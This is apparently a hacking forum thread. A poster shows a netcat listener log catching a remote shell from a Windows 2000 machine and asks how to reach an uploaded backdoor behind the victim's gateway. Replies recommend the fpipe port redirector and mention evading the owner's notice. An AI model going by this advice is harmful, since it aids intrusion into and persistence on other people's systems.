info - example:


E:\bonzaibuddy\NC141+TFTP>nc.exe -vv -L -p 141
listening on [any] 141 ...
Warning: forward host lookup failed for 75-666.666.76.dellhost.com: h_errno 1100
4: NO_DATA
connect to [696.696.11.156] from inet.box.dellhost.com [666.666.76.75] 2411:
NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Live:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 666.666.76.75
Subnet Mask . . . . . . . . . . . : 255.255.255.128
Default Gateway . . . . . . . . . : 666.666.76.1

C:\WINNT\system32>


How is it done ? Here is the case !

U got an remote shell (over the inet) not LAN on box 666.666.76.75 u can execute command thrue the netcat shell and upload files. However ! Even that the files (ex. backdoor) are wel executed (u see it in tlist.exe) u cant connect to them because the box connects thrue a gateway, meaning router or other node.

So, your file (backdoor) runs @ port 69 BUT it is not forwarded on the gateway (666.666.76.1) wich means U cant connect to your file (backdoor or ftp or so)

Now... u dont got a shell on the gateway so u cant mess there.

I know there is a way around it (it is been done al the time), can sombody pleasy explain how it is done.

Thanx in advance for the info.

fpipe should do the trick



http://www.foundstone.com/index.htm?subnav.../assessment.htm


SkitZZ

Gonna check it out !
Thx SkitZZ

try using fpipe on a system while it shouldn't be spotted... it keeps a command prompt open and it tells the system owner exactly which connections are made..

i'm writing a port redirector myself at the moment,when i finish it it will be available on my site